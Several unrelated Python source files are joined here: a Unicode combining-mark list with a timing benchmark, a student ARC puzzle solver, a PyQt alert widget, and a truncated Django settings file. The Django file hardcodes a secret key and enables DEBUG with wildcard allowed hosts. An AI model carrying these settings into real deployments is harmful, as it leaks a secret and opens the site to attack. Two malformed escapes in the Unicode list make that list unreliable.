"\u032D",
"\u032E",
"\u032F",
"\u0330",
"\u0331",
"\u0332",
"\u0333",
"\u0334",
"\u0335",
"\u0336",
"\u0337",
"\u0338",
"\u0339",
"\u033A",
"\u033B",
"\u033C",
"\u033D",
"\u033E",
"\u033F",
"\u0340",
"\u0341",
"\u0342",
"\u0343",
"\u0344",
"\u0345",
"\u0346",
"\u0347",
"\u0348",
"\u0349",
"\u034A",
"\u034B",
"\u034C",
"\u034D",
"\u034E",
"\u034F",
"\u0350",
"\u0351",
"\u0352",
"\u0353",
"\u0354",
"\u0355",
"\u0356",
"\u0357",
"\u0358",
"\u0359",
"\u035A",
"\u035B",
"\u035C",
"\u035D",
"\u035E",
"\u035F",
"\u0360",
"\u0361",
"\u0362",
"\u0363",
"\u0364",
"\u0365",
"\u0366",
"\u0367",
"\u0368",
"\u0369",
"\u036A",
"\u036B",
"\u036C",
"\u036D",
"\u036E",
"\u036F",
"\u0483",
"\u0484",
"\u0485",
"\u0486",
"\u0487",
"\u0591",
"\u0592",
"\u0593",
"\u0594",
"\u0595",
"\u0596",
"\u0597",
"\u0598",
"\u0599",
"\u059A",
"\u059B",
"\u059C",
"\u059D",
"\u059E",
"\u059F",
"\u05A0",
"\u05A1",
"\u05A2",
"\u05A3",
"\u05A4",
"\u05A5",
"\u05A6",
"\u05A7",
"\u05A8",
"\u05A9",
"\u05AA",
"\u05AB",
"\u05AC",
"\u05AD",
"\u05AE",
"\u05AF",
"\u05B0",
"\u05B1",
"\u05B2",
"\u05B3",
"\u05B4",
"\u05B5",
"\u05B6",
"\u05B7",
"\u05B8",
"\u05B9",
"\u05BA",
"\u05BB",
"\u05BC",
"\u05BD",
"\u05BF",
"\u05C1",
"\u05C2",
"\u05C4",
"\u05C5",
"\u05C7",
"\u0610",
"\u0611",
"\u0612",
"\u0613",
"\u0614",
"\u0615",
"\u0616",
"\u0617",
"\u0618",
"\u0619",
"\u061A",
"\u064B",
"\u064C",
"\u064D",
"\u064E",
"\u064F",
"\u0650",
"\u0651",
"\u0652",
"\u0653",
"\u0654",
"\u0655",
"\u0656",
"\u0657",
"\u0658",
"\u0659",
"\u065A",
"\u065B",
"\u065C",
"\u065D",
"\u065E",
"\u065F",
"\u0670",
"\u06D6",
"\u06D7",
"\u06D8",
"\u06D9",
"\u06DA",
"\u06DB",
"\u06DC",
"\u06DF",
"\u06E0",
"\u06E1",
"\u06E2",
"\u06E3",
"\u06E4",
"\u06E7",
"\u06E8",
"\u06EA",
"\u06EB",
"\u06EC",
"\u06ED",
"\u0711",
"\u0730",
"\u0731",
"\u0732",
"\u0733",
"\u0734",
"\u0735",
"\u0736",
"\u0737",
"\u0738",
"\u0739",
"\u073A",
"\u073B",
"\u073C",
"\u073D",
"\u073E",
"\u073F",
"\u0740",
"\u0741",
"\u0742",
"\u0743",
"\u0744",
"\u0745",
"\u0746",
"\u0747",
"\u0748",
"\u0749",
"\u074A",
"\u07A6",
"\u07A7",
"\u07A8",
"\u07A9",
"\u07AA",
"\u07AB",
"\u07AC",
"\u07AD",
"\u07AE",
"\u07AF",
"\u07B0",
"\u07EB",
"\u07EC",
"\u07ED",
"\u07EE",
"\u07EF",
"\u07F0",
"\u07F1",
"\u07F2",
"\u07F3",
"\u0816",
"\u0817",
"\u0818",
"\u0819",
"\u081B",
"\u081C",
"\u081D",
"\u081E",
"\u081F",
"\u0820",
"\u0821",
"\u0822",
"\u0823",
"\u0825",
"\u0826",
"\u0827",
"\u0829",
"\u082A",
"\u082B",
"\u082C",
"\u082D",
"\u0859",
"\u085A",
"\u085B",
"\u08E4",
"\u08E5",
"\u08E6",
"\u08E7",
"\u08E8",
"\u08E9",
"\u08EA",
"\u08EB",
"\u08EC",
"\u08ED",
"\u08EE",
"\u08EF",
"\u08F0",
"\u08F1",
"\u08F2",
"\u08F3",
"\u08F4",
"\u08F5",
"\u08F6",
"\u08F7",
"\u08F8",
"\u08F9",
"\u08FA",
"\u08FB",
"\u08FC",
"\u08FD",
"\u08FE",
"\u0900",
"\u0901",
"\u0902",
"\u093A",
"\u093C",
"\u093E",
"\u0941",
"\u0942",
"\u0943",
"\u0944",
"\u0945",
"\u0946",
"\u0947",
"\u0948",
"\u094D",
"\u0951",
"\u0952",
"\u0953",
"\u0954",
"\u0955",
"\u0956",
"\u0957",
"\u0962",
"\u0963",
"\u0981",
"\u09BC",
"\u09C1",
"\u09C2",
"\u09C3",
"\u09C4",
"\u09CD",
"\u09E2",
"\u09E3",
"\u0A01",
"\u0A02",
"\u0A3C",
"\u0A41",
"\u0A42",
"\u0A47",
"\u0A48",
"\u0A4B",
"\u0A4C",
"\u0A4D",
"\u0A51",
"\u0A70",
"\u0A71",
"\u0A75",
"\u0A81",
"\u0A82",
"\u0ABC",
"\u0AC1",
"\u0AC2",
"\u0AC3",
"\u0AC4",
"\u0AC5",
"\u0AC7",
"\u0AC8",
"\u0ACD",
"\u0AE2",
"\u0AE3",
"\u0B01",
"\u0B3C",
"\u0B3F",
"\u0B41",
"\u0B42",
"\u0B43",
"\u0B44",
"\u0B4D",
"\u0B56",
"\u0B62",
"\u0B63",
"\u0B82",
"\u0BC0",
"\u0BCD",
"\u0C3E",
"\u0C3F",
"\u0C40",
"\u0C46",
"\u0C47",
"\u0C48",
"\u0C4A",
"\u0C4B",
"\u0C4C",
"\u0C4D",
"\u0C55",
"\u0C56",
"\u0C62",
"\u0C63",
"\u0CBC",
"\u0CBF",
"\u0CC6",
"\u0CCC",
"\u0CCD",
"\u0CE2",
"\u0CE3",
"\u0D41",
"\u0D42",
"\u0D43",
"\u0D44",
"\u0D4D",
"\u0D62",
"\u0D63",
"\u0DCA",
"\u0DD2",
"\u0DD3",
"\u0DD4",
"\u0DD6",
"\u0E31",
"\u0E34",
"\u0E35",
"\u0E36",
"\u0E37",
"\u0E38",
"\u0E39",
"\u0E3A",
"\u0E47",
"\u0E48",
"\u0E49",
"\u0E4A",
"\u0E4B",
"\u0E4C",
"\u0E4D",
"\u0E4E",
"\u0EB1",
"\u0EB4",
"\u0EB5",
"\u0EB6",
"\u0EB7",
"\u0EB8",
"\u0EB9",
"\u0EBB",
"\u0EBC",
"\u0EC8",
"\u0EC9",
"\u0ECA",
"\u0ECB",
"\u0ECC",
"\u0ECD",
"\u0F18",
"\u0F19",
"\u0F35",
"\u0F37",
"\u0F39",
"\u0F71",
"\u0F72",
"\u0F73",
"\u0F74",
"\u0F75",
"\u0F76",
"\u0F77",
"\u0F78",
"\u0F79",
"\u0F7A",
"\u0F7B",
"\u0F7C",
"\u0F7D",
"\u0F7E",
"\u0F80",
"\u0F81",
"\u0F82",
"\u0F83",
"\u0F84",
"\u0F86",
"\u0F87",
"\u0F8D",
"\u0F8E",
"\u0F8F",
"\u0F90",
"\u0F91",
"\u0F92",
"\u0F93",
"\u0F94",
"\u0F95",
"\u0F96",
"\u0F97",
"\u0F99",
"\u0F9A",
"\u0F9B",
"\u0F9C",
"\u0F9D",
"\u0F9E",
"\u0F9F",
"\u0FA0",
"\u0FA1",
"\u0FA2",
"\u0FA3",
"\u0FA4",
"\u0FA5",
"\u0FA6",
"\u0FA7",
"\u0FA8",
"\u0FA9",
"\u0FAA",
"\u0FAB",
"\u0FAC",
"\u0FAD",
"\u0FAE",
"\u0FAF",
"\u0FB0",
"\u0FB1",
"\u0FB2",
"\u0FB3",
"\u0FB4",
"\u0FB5",
"\u0FB6",
"\u0FB7",
"\u0FB8",
"\u0FB9",
"\u0FBA",
"\u0FBB",
"\u0FBC",
"\u0FC6",
"\u102D",
"\u102E",
"\u102F",
"\u1030",
"\u1032",
"\u1033",
"\u1034",
"\u1035",
"\u1036",
"\u1037",
"\u1039",
"\u103A",
"\u103D",
"\u103E",
"\u1058",
"\u1059",
"\u105E",
"\u105F",
"\u1060",
"\u1071",
"\u1072",
"\u1073",
"\u1074",
"\u1082",
"\u1085",
"\u1086",
"\u108D",
"\u109D",
"\u135D",
"\u135E",
"\u135F",
"\u1712",
"\u1713",
"\u1714",
"\u1732",
"\u1733",
"\u1734",
"\u1752",
"\u1753",
"\u1772",
"\u1773",
"\u17B4",
"\u17B5",
"\u17B7",
"\u17B8",
"\u17B9",
"\u17BA",
"\u17BB",
"\u17BC",
"\u17BD",
"\u17C6",
"\u17C9",
"\u17CA",
"\u17CB",
"\u17CC",
"\u17CD",
"\u17CE",
"\u17CF",
"\u17D0",
"\u17D1",
"\u17D2",
"\u17D3",
"\u17DD",
"\u180B",
"\u180C",
"\u180D",
"\u18A9",
"\u1920",
"\u1921",
"\u1922",
"\u1927",
"\u1928",
"\u1932",
"\u1939",
"\u193A",
"\u193B",
"\u1A17",
"\u1A18",
"\u1A56",
"\u1A58",
"\u1A59",
"\u1A5A",
"\u1A5B",
"\u1A5C",
"\u1A5D",
"\u1A5E",
"\u1A60",
"\u1A62",
"\u1A65",
"\u1A66",
"\u1A67",
"\u1A68",
"\u1A69",
"\u1A6A",
"\u1A6B",
"\u1A6C",
"\u1A73",
"\u1A74",
"\u1A75",
"\u1A76",
"\u1A77",
"\u1A78",
"\u1A79",
"\u1A7A",
"\u1A7B",
"\u1A7C",
"\u1A7F",
"\u1B00",
"\u1B01",
"\u1B02",
"\u1B03",
"\u1B34",
"\u1B36",
"\u1B37",
"\u1B38",
"\u1B39",
"\u1B3A",
"\u1B3C",
"\u1B42",
"\u1B6B",
"\u1B6C",
"\u1B6D",
"\u1B6E",
"\u1B6F",
"\u1B70",
"\u1B71",
"\u1B72",
"\u1B73",
"\u1B80",
"\u1B81",
"\u1BA2",
"\u1BA3",
"\u1BA4",
"\u1BA5",
"\u1BA8",
"\u1BA9",
"\u1BAB",
"\u1BE6",
"\u1BE8",
"\u1BE9",
"\u1BED",
"\u1BEF",
"\u1BF0",
"\u1BF1",
"\u1C2C",
"\u1C2D",
"\u1C2E",
"\u1C2F",
"\u1C30",
"\u1C31",
"\u1C32",
"\u1C33",
"\u1C36",
"\u1C37",
"\u1CD0",
"\u1CD1",
"\u1CD2",
"\u1CD4",
"\u1CD5",
"\u1CD6",
"\u1CD7",
"\u1CD8",
"\u1CD9",
"\u1CDA",
"\u1CDB",
"\u1CDC",
"\u1CDD",
"\u1CDE",
"\u1CDF",
"\u1CE0",
"\u1CE2",
"\u1CE3",
"\u1CE4",
"\u1CE5",
"\u1CE6",
"\u1CE7",
"\u1CE8",
"\u1CED",
"\u1CF4",
"\u1DC0",
"\u1DC1",
"\u1DC2",
"\u1DC3",
"\u1DC4",
"\u1DC5",
"\u1DC6",
"\u1DC7",
"\u1DC8",
"\u1DC9",
"\u1DCA",
"\u1DCB",
"\u1DCC",
"\u1DCD",
"\u1DCE",
"\u1DCF",
"\u1DD0",
"\u1DD1",
"\u1DD2",
"\u1DD3",
"\u1DD4",
"\u1DD5",
"\u1DD6",
"\u1DD7",
"\u1DD8",
"\u1DD9",
"\u1DDA",
"\u1DDB",
"\u1DDC",
"\u1DDD",
"\u1DDE",
"\u1DDF",
"\u1DE0",
"\u1DE1",
"\u1DE2",
"\u1DE3",
"\u1DE4",
"\u1DE5",
"\u1DE6",
"\u1DFC",
"\u1DFD",
"\u1DFE",
"\u1DFF",
"\u20D0",
"\u20D1",
"\u20D2",
"\u20D3",
"\u20D4",
"\u20D5",
"\u20D6",
"\u20D7",
"\u20D8",
"\u20D9",
"\u20DA",
"\u20DB",
"\u20DC",
"\u20E1",
"\u20E5",
"\u20E6",
"\u20E7",
"\u20E8",
"\u20E9",
"\u20EA",
"\u20EB",
"\u20EC",
"\u20ED",
"\u20EE",
"\u20EF",
"\u20F0",
"\u2CEF",
"\u2CF0",
"\u2CF1",
"\u2D7F",
"\u2DE0",
"\u2DE1",
"\u2DE2",
"\u2DE3",
"\u2DE4",
"\u2DE5",
"\u2DE6",
"\u2DE7",
"\u2DE8",
"\u2DE9",
"\u2DEA",
"\u2DEB",
"\u2DEC",
"\u2DED",
"\u2DEE",
"\u2DEF",
"\u2DF0",
"\u2DF1",
"\u2DF2",
"\u2DF3",
"\u2DF4",
"\u2DF5",
"\u2DF6",
"\u2DF7",
"\u2DF8",
"\u2DF9",
"\u2DFA",
"\u2DFB",
"\u2DFC",
"\u2DFD",
"\u2DFE",
"\u2DFF",
"\u302A",
"\u302B",
"\u302C",
"\u302D",
"\u3099",
"\u309A",
"\uA66F",
"\uA674",
"\uA675",
"\uA676",
"\uA677",
"\uA678",
"\uA679",
"\uA67A",
"\uA67B",
"\uA67C",
"\uA67D",
"\uA69F",
"\uA6F0",
"\uA6F1",
"\uA802",
"\uA806",
"\uA80B",
"\uA825",
"\uA826",
"\uA8C4",
"\uA8E0",
"\uA8E1",
"\uA8E2",
"\uA8E3",
"\uA8E4",
"\uA8E5",
"\uA8E6",
"\uA8E7",
"\uA8E8",
"\uA8E9",
"\uA8EA",
"\uA8EB",
"\uA8EC",
"\uA8ED",
"\uA8EE",
"\uA8EF",
"\uA8F0",
"\uA8F1",
"\uA926",
"\uA927",
"\uA928",
"\uA929",
"\uA92A",
"\uA92B",
"\uA92C",
"\uA92D",
"\uA947",
"\uA948",
"\uA949",
"\uA94A",
"\uA94B",
"\uA94C",
"\uA94D",
"\uA94E",
"\uA94F",
"\uA950",
"\uA951",
"\uA980",
"\uA981",
"\uA982",
"\uA9B3",
"\uA9B6",
"\uA9B7",
"\uA9B8",
"\uA9B9",
"\uA9BC",
"\uAA29",
"\uAA2A",
"\uAA2B",
"\uAA2C",
"\uAA2D",
"\uAA2E",
"\uAA31",
"\uAA32",
"\uAA35",
"\uAA36",
"\uAA43",
"\uAA4C",
"\uAAB0",
"\uAAB2",
"\uAAB3",
"\uAAB4",
"\uAAB7",
"\uAAB8",
"\uAABE",
"\uAABF",
"\uAAC1",
"\uAAEC",
"\uAAED",
"\uAAF6",
"\uABE5",
"\uABE8",
"\uABED",
"\uFB1E",
"\uFE00",
"\uFE01",
"\uFE02",
"\uFE03",
"\uFE04",
"\uFE05",
"\uFE06",
"\uFE07",
"\uFE08",
"\uFE09",
"\uFE0A",
"\uFE0B",
"\uFE0C",
"\uFE0D",
"\uFE0E",
"\uFE0F",
"\uFE20",
"\uFE21",
"\uFE22",
"\uFE23",
"\uFE24",
"\uFE25",
"\uFE26",
"\U000101FD",
"\U00010A01",
"\U00010A02",
"\U00010A03",
"\U00010A05",
"\U00010A06",
"\U00010A0C",
"\U00010A0D",
"\U00010A0E",
"\U00010A0F",
"\U00010A38",
"\U00010A39",
"\U00010A3A",
"\U00010A3F",
"\U00011001",
"\U00011038",
"\U00011039",
"\U0001103A",
"\U0001103B",
"\U0001103C",
"\U0001103D",
"\U0001103E",
"\U0001103F",
"\U00011040",
"\U00011041",
"\U00011042",
"\U00011043",
"\U00011044",
"\U00011045",
"\U00011046",
"\U00011080",
"\U00011081",
"\U000110B3",
"\U000110B4",
"\U000110B5",
"\U000110B6",
"\U000110B9",
"\U000110BA",
"\U00011100",
"\U00011101",
"\U00011102",
"\U00011127",
"\U00011128",
"\U00011129",
"\U0001112A",
"\U0001112B",
"\U0001112D",
"\U0001112E",
"\U0001112F",
"\U00011130",
"\U00011131",
"\U00011132",
"\U00011133",
"\U00011134",
"\U00011180",
"\U00011181",
"\U000111B6",
"\U000111B7",
"\U000111B8",
"\U000111B9",
"\U000111BA",
"\U000111BB",
"\U000111BC",
"\U000111BD",
"\U000111BE",
"\U000116AB",
"\U000116AD",
"\U000116B0",
"\U000116B1",
"\U000116B2",
"\U000116B3",
"\U000116B4",
"\U000116B5",
"\U000116B7",
"\U00016F8F",
"\U00016F90",
"\U00016F91",
"\U00016F92",
"\U0001D167",
"\U0001D168",
"\U0001D169",
"\U0001D17B",
"\U0001D17C",
"\U0001D17D",
"\U0001D17E",
"\U0001D17F",
"\U0001D180",
"\U0001D181",
"\U0001D182",
"\U0001D185",
"\U0001D186",
"\U0001D187",
"\U0001D188",
"\U0001D189",
"\U0001D18A",
"\U0001D18B",
"\U0001D1AA",
"\U0001D1AB",
"\U0001D1AC",
"\U0001D1AD",
"\U0001D242",
"\U0001D243",
"\U0001D244",
"\U000E0100",
"\U000E0101",
"\U000E0102",
"\U000E0103",
"\U000E0104",
"\U000E0105",
"\U000E0106",
"\U000E0107",
"\U000E0108",
"\U000E0109",
"\U000E010A",
"\U000E010B",
"\U000E010C",
"\U000E010D",
"\U000E010E",
"\U000E010F",
"\U000E0110",
"\U000E0111",
"\U000E0112",
"\U000E0113",
"\U000E0114",
"\U000E0115",
"\U000E0116",
"\U000E0117",
"\U000E0118",
"\U000E0119",
"\U000E011A",
"\U000E011B",
"\U000E011C",
"\U000E011D",
"\U000E011E",
"\U000E011F",
"\U000E0120",
"\U000E0121",
"\U000E0122",
"\U000E0123",
"\U000E0124",
"\U000E0125",
"\U000E0126",
"\U000E0127",
"\U000E0128",
"\U000E0129",
"\U000E012A",
"\U000E012B",
"\uE012C",
"\U000E012D",
"\U000E012E",
"\U000E012F",
"\U000E0130",
"\U000E0131",
"\U000E0132",
"\U000E0133",
"\U000E0134",
"\U000E0135",
"\U000E0136",
"\U000E0137",
"\U000E0138",
"\U000E0139",
"\U000E013A",
"\U000E013B",
"\U000E013C",
"\U000E013D",
"\U000E013E",
"\U000E013F",
"\U000E0140",
"\U000E0141",
"\U000E0142",
"\U000E0143",
"\U000E0144",
"\U000E0145",
"\U000E0146",
"\U000E0147",
"\U000E0148",
"\U000E0149",
"\U000E014A",
"\U000E014B",
"\U000E014C",
"\U000E014D",
"\U000E014E",
"\U000E014F",
"\U000E0150",
"\U000E0151",
"\U000E0152",
"\U000E0153",
"\U000E0154",
"\U000E0155",
"\U000E0156",
"\U000E0157",
"\U000E0158",
"\U000E0159",
"\U000E015A",
"\U000E015B",
"\U000E015C",
"\U000E015D",
"\U000E015E",
"\U000E015F",
"\U000E0160",
"\U000E0161",
"\U000E0162",
"\U000E0163",
"\U000E0164",
"\U000E0165",
"\U000E0166",
"\U000E0167",
"\U000E0168",
"\U000E0169",
"\U000E016A",
"\U000E016B",
"\U000E016C",
"\U000E016D",
"\U000E016E",
"\U000E016F",
"\U000E0170",
"\U000E0171",
"\U000E0172",
"\U000E0173",
"\U000E0174",
"\U000E0175",
"\U000E0176",
"\U000E0177",
"\U000E0178",
"\U000E0179",
"\U000E017A",
"\U000E017B",
"\U000E017C",
"\U000E017D",
"\U000E017E",
"\U000E017F",
"\U000E0180",
"\U000E0181",
"\U000E0182",
"\U000E0183",
"\U000E0184",
"\U000E0185",
"\uE0186",
"\U000E0187",
"\U000E0188",
"\U000E0189",
"\U000E018A",
"\U000E018B",
"\U000E018C",
"\U000E018D",
"\U000E018E",
"\U000E018F",
"\U000E0190",
"\U000E0191",
"\U000E0192",
"\U000E0193",
"\U000E0194",
"\U000E0195",
"\U000E0196",
"\U000E0197",
"\U000E0198",
"\U000E0199",
"\U000E019A",
"\U000E019B",
"\U000E019C",
"\U000E019D",
"\U000E019E",
"\U000E019F",
"\U000E01A0",
"\U000E01A1",
"\U000E01A2",
"\U000E01A3",
"\U000E01A4",
"\U000E01A5",
"\U000E01A6",
"\U000E01A7",
"\U000E01A8",
"\U000E01A9",
"\U000E01AA",
"\U000E01AB",
"\U000E01AC",
"\U000E01AD",
"\U000E01AE",
"\U000E01AF",
"\U000E01B0",
"\U000E01B1",
"\U000E01B2",
"\U000E01B3",
"\U000E01B4",
"\U000E01B5",
"\U000E01B6",
"\U000E01B7",
"\U000E01B8",
"\U000E01B9",
"\U000E01BA",
"\U000E01BB",
"\U000E01BC",
"\U000E01BD",
"\U000E01BE",
"\U000E01BF",
"\U000E01C0",
"\U000E01C1",
"\U000E01C2",
"\U000E01C3",
"\U000E01C4",
"\U000E01C5",
"\U000E01C6",
"\U000E01C7",
"\U000E01C8",
"\U000E01C9",
"\U000E01CA",
"\U000E01CB",
"\U000E01CC",
"\U000E01CD",
"\U000E01CE",
"\U000E01CF",
"\U000E01D0",
"\U000E01D1",
"\U000E01D2",
"\U000E01D3",
"\U000E01D4",
"\U000E01D5",
"\U000E01D6",
"\U000E01D7",
"\U000E01D8",
"\U000E01D9",
"\U000E01DA",
"\U000E01DB",
"\U000E01DC",
"\U000E01DD",
"\U000E01DE",
"\U000E01DF",
"\U000E01E0",
"\U000E01E1",
"\U000E01E2",
"\U000E01E3",
"\U000E01E4",
"\U000E01E5",
"\U000E01E6",
"\U000E01E7",
"\U000E01E8",
"\U000E01E9",
"\U000E01EA",
"\U000E01EB",
"\U000E01EC",
"\U000E01ED",
"\U000E01EE",
"\U000E01EF",
]
MARK_SET = {
chr(c) for c in range(sys.maxunicode + 1) if unicodedata.category(chr(c))[0] == "M"
}
print("len(UNICODE_NSM) = {}".format(len(UNICODE_NSM)))
print("len(MARK_SET) = {}".format(len(MARK_SET)))
filepath = "UnicodeData.txt"
with open(filepath) as f:
text = f.read()
text = text[:10000]
def main():
ground_truth = loop_count(text)
functions = [ # (loop_count, 'loop_count'),
# (generator_count, 'generator_count'),
(category_count, "category_count"),
(markset_count, "markset_count"),
]
functions = functions[::-1]
duration_list = {}
for func, name in functions:
is_correct = func(text) == ground_truth
durations = timeit.repeat(lambda: func(text), repeat=5000, number=3)
if is_correct:
correctness = "correct"
else:
correctness = "NOT correct"
duration_list[name] = durations
print(
"{func:<20}: {correctness}, "
"min: {min:0.3f}s, mean: {mean:0.3f}s, max: {max:0.3f}s".format(
func=name,
correctness=correctness,
min=min(durations),
mean=np.mean(durations),
max=max(durations),
)
)
create_boxplot(duration_list)
def create_boxplot(duration_list):
import operator
import matplotlib.pyplot as plt
import seaborn as sns
plt.figure(num=None, figsize=(8, 4), dpi=300, facecolor="w", edgecolor="k")
sns.set(style="whitegrid")
sorted_keys, sorted_vals = zip(
*sorted(duration_list.items(), key=operator.itemgetter(1))
)
flierprops = dict(markerfacecolor="0.75", markersize=1, linestyle="none")
ax = sns.boxplot(data=sorted_vals, width=0.3, orient="h", flierprops=flierprops)
ax.set(xlabel="Time in s", ylabel="")
plt.yticks(plt.yticks()[0], sorted_keys)
plt.tight_layout()
plt.savefig("output.png")
def generator_count(text):
return sum(1 for char in text if char not in UNICODE_NSM)
def loop_count(text):
# 1769137
count = 0
for char in text:
if char not in UNICODE_NSM:
count += 1
return count
def markset_count(text):
return sum(char not in MARK_SET for char in text)
def category_count(text):
return sum(unicodedata.category(char) != "Mn" for char in text)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 09:27:11 2019
@author: Ronan Murphy 15397831
Assignment 3: Hand-coding solutions for the Abstraction and Reasoning Corpus
"""
import sys
import format_json as fj
"""
import sys and format json to give ability to read in json files
"""
"""
reads in the json files and splits the data into train and test
"""
file = str(sys.argv[1])
train_input,train_output,test_input,test_output = fj.read_file(file)
"""
solve method used to to convert input into output
reverse the input using the [::-1] function
then add the reversed input to the original ouput
using the extend function
append the array to another outter array to return the correct format
return this array
"""
def solve(inputs):
out =[]
for i in range(len(inputs)):
inp = inputs[i]
inp_array = inputs[i]
reverse = inp_array[::-1]
inp.extend(reverse)
out.append(inp)
return out
"""
Compares the input and output data calling the print_out function
"""
fj.print_out(train_input, train_output, test_input, test_output, solve)
|
import typing
from typing import List, Union, Tuple
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QSizePolicy
from brainframe_qt.api_utils import api
from brainframe.api import bf_codecs
from brainframe_qt.ui.resources import stylesheet_watcher, QTAsyncWorker
from brainframe_qt.ui.resources.paths import qt_qss_paths
class AlertDetailUI(QWidget):
def __init__(self, parent: QWidget):
super().__init__(parent)
self._description = ""
self.alert_description_label = self._init_alert_description_label()
self._init_layout()
self._init_style()
def _init_alert_description_label(self) -> QLabel:
alert_description_label = QLabel(self._description, self)
alert_description_label.setObjectName("alert_description")
alert_description_label.setWordWrap(True)
alert_description_label.setSizePolicy(QSizePolicy.Preferred,
QSizePolicy.Expanding)
alert_description_label.setAlignment(Qt.AlignTop)
return alert_description_label
def _init_layout(self):
layout = QVBoxLayout()
layout.setAlignment(Qt.AlignTop)
layout.addWidget(self.alert_description_label)
self.setLayout(layout)
def _init_style(self) -> None:
# Allow background of widget to be styled
self.setAttribute(Qt.WA_StyledBackground, True)
stylesheet_watcher.watch(self, qt_qss_paths.alert_detail_qss)
@property
def description(self) -> str:
return self._description
@description.setter
def description(self, description: str):
self._description = description
self.alert_description_label.setText(description)
class AlertDetail(AlertDetailUI):
def __init__(self, parent: QWidget):
super().__init__(parent)
self.alert = typing.cast(bf_codecs.Alert, None)
def populate_from_server(self):
if not self.alert:
return
def get_alert_info() -> Tuple[bf_codecs.ZoneAlarm, bf_codecs.Zone]:
alarm = api.get_zone_alarm(self.alert.alarm_id)
zone = api.get_zone(alarm.zone_id)
return alarm, zone
def handle_api_error(error):
raise error
QTAsyncWorker(self, get_alert_info,
on_success=self.display_alert_info,
on_error=handle_api_error) \
.start()
def display_alert_info(self, alarm_zone):
alarm: bf_codecs.ZoneAlarm
zone: bf_codecs.Zone
alarm, zone = alarm_zone
# Create text for alert
description = ""
conditions: List[Union[bf_codecs.ZoneAlarmCountCondition,
bf_codecs.ZoneAlarmRateCondition]] \
= alarm.count_conditions + alarm.rate_conditions
for condition in conditions:
text = self.tr('"{0}" in region "{1}"')
text = text.format(repr(condition).strip(), zone.name)
description += text
self.description = description
def set_alert(self, alert: bf_codecs.Alert) -> None:
self.alert = alert
|
"""
Django settings for django_AUS project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
from dotenv import load_dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
ENV_PATH = os.path.join(os.path.dirname(__file__), '.env')
load_dotenv(dotenv_path=ENV_PATH)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-s-0zdu!w@9hc0vb@#wzxo0$ro%gd9pxzd^b^6(kdwswp*-*6qc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"emailapp",
'rest_framework',
'crispy_forms',
'django_forms_bootstrap',
'bootstrap4',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_AUS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_AUS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient"
},
"KEY_PREFIX": "rdb_"
}
}
DEFAULT_TIMEOUT = 60*60
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10,
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = os.path.join(BASE_DIR, "static"),
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media")
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
API_TOKEN = os.environ.get("API_TOKEN")
WEB_TOKEN = os.environ.get("WEB_TOKEN")
YASHI_MULTI_EMAIL_SERVICE_CONFIG = {
#ses
"USERNAME_SMTP" : os.environ.get("USERNAME_SMTP"),
"PASSWORD_SMTP" : os.environ.get("PASSWORD_SMTP"),
#google smtp
"GOOGLE_SMTP_USERNAME" : os.environ.get("GOOGLE_SMTP_USERNAME"),
"GOOGLE_SMTP_PASSWORD" :os.environ.get("GOOGLE_SMTP_PASSWORD"),
#sendgrid
"SENDGRID_API_kEY" : os.environ.get("SENDGRID_API_kEY"),
#general for all 3 services(assumig sending email is same for all services)
"FROM_EMAIL": os.environ.get("FROM_EMAIL"),
